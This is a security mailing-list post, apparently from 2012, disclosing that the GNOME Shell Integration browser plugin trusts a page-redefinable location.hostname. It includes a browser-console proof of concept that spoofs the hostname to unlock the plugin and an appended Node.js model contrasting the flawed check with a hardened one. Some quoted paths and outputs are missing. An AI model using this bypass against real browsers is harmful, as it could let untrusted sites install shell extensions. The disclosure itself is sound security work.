Date: Sun, 9 Sep 2012 00:36:26 +0200
From: Tavis Ormandy <>
Subject: note on gnome shell extensions

List, I just installed Fedora 17 on a workstation. While researching how to
upgrade gnome 3 to version 2, I noticed it installed a browser extension
called "Gnome Shell Integration".

$ rpm -qf /usr/lib64/mozilla/plugins/

The NPPVpluginDescriptionString states "It can be used only by", but I happen to know that is a tricky thing to get

  if (!funcs.getproperty (instance, NPVARIANT_TO_OBJECT (document),
                          funcs.getstringidentifier ("location"),
                          &location))
    goto out;

  if (!NPVARIANT_IS_OBJECT (location))
    goto out;

  hostname = get_string_property (instance,
                                  NPVARIANT_TO_OBJECT (location),
                                  "hostname");

  if (g_strcmp0 (hostname, ORIGIN))
    {
      g_debug ("origin does not match, is %s",
               hostname);

      goto out;
    }

I'm familiar with this topic as I wrote a tool for managing broken but
necessary plugins by restricting them to trusted domains.

As far as I know, browsers only attempt to prevent tampering with
document.location.href, anything else can be modified. For example, this
works in Chrome, I don't know the syntax for Mozilla:

> location.__defineGetter__("hostname", function () { return "arbitrary"; })
> location.hostname


> location.__defineGetter__("href", function () { return "arbitrary"; })
> location.href

So this should fail:

> o = document.createElement('OBJECT')
> o.setAttribute('TYPE', 'application/x-gnome-shell-integration')
> document.body.appendChild(o)
  <object type="application/x-gnome-shell-integration"></object>
> o.shellVersion

But we can re-insert it and make it work:

> document.body.removeChild(o)
  <object type="application/x-gnome-shell-integration"></object>
> location.__defineGetter__("hostname", function () { return ""; })
> document.body.appendChild(o)
  <object type="application/x-gnome-shell-integration"></object>
> o.shellVersion
> document.location.href

The plugin incorrectly trusted hostname, and initialized. As far as I can
tell, the plugin will let you install new shell extensions, I don't know
what the impact of that is, can they contain native code?


------------------------------------- | pgp encrypted mail preferred
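
Added example, not part of the original post and not the plugin's code: a Node.js model of the hostname check quoted in the message, next to a hardened form that compares a URL supplied by the host instead of reading page-scriptable properties. The location stand-in, the host name trusted.example (a placeholder for the plugin's ORIGIN) and the hostSuppliedUrl parameter are assumptions made for the illustration.

```javascript
const TRUSTED_HOST = "trusted.example"; // placeholder for the plugin's ORIGIN

// Constructed stand-in for the page's location object: `href` is locked,
// while `hostname` stays redefinable by page script, as the post describes.
function makeLocation(realHref) {
  const loc = {};
  Object.defineProperty(loc, "href", {
    get: () => realHref, configurable: false });
  Object.defineProperty(loc, "hostname", {
    get: () => new URL(realHref).hostname, configurable: true });
  return loc;
}

// Same shape as the quoted check: trusts the script-visible property.
function checkScriptVisibleHostname(loc) {
  return loc.hostname === TRUSTED_HOST;
}

// Hardened shape: parse a URL the host hands over out of band
// (hypothetical parameter) and never read page-scriptable properties.
function checkHostSuppliedUrl(hostSuppliedUrl) {
  try {
    return new URL(hostSuppliedUrl).hostname === TRUSTED_HOST;
  } catch (e) {
    return false; // unparsable URL: fail closed
  }
}

function runDemo() {
  const realHref = "https://untrusted.example/page"; // constructed input
  const loc = makeLocation(realHref);
  const before = checkScriptVisibleHostname(loc);
  // Page script shadows hostname, as in the console session in the post.
  loc.__defineGetter__("hostname", function () { return TRUSTED_HOST; });
  let hrefRedefined = true;
  try {
    loc.__defineGetter__("href", function () { return "arbitrary"; });
  } catch (e) {
    hrefRedefined = false; // locked property rejects the redefinition
  }
  return { before, afterShadow: checkScriptVisibleHostname(loc),
           hardened: checkHostSuppliedUrl(realHref), hrefRedefined };
}

console.log(runDemo());
```
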
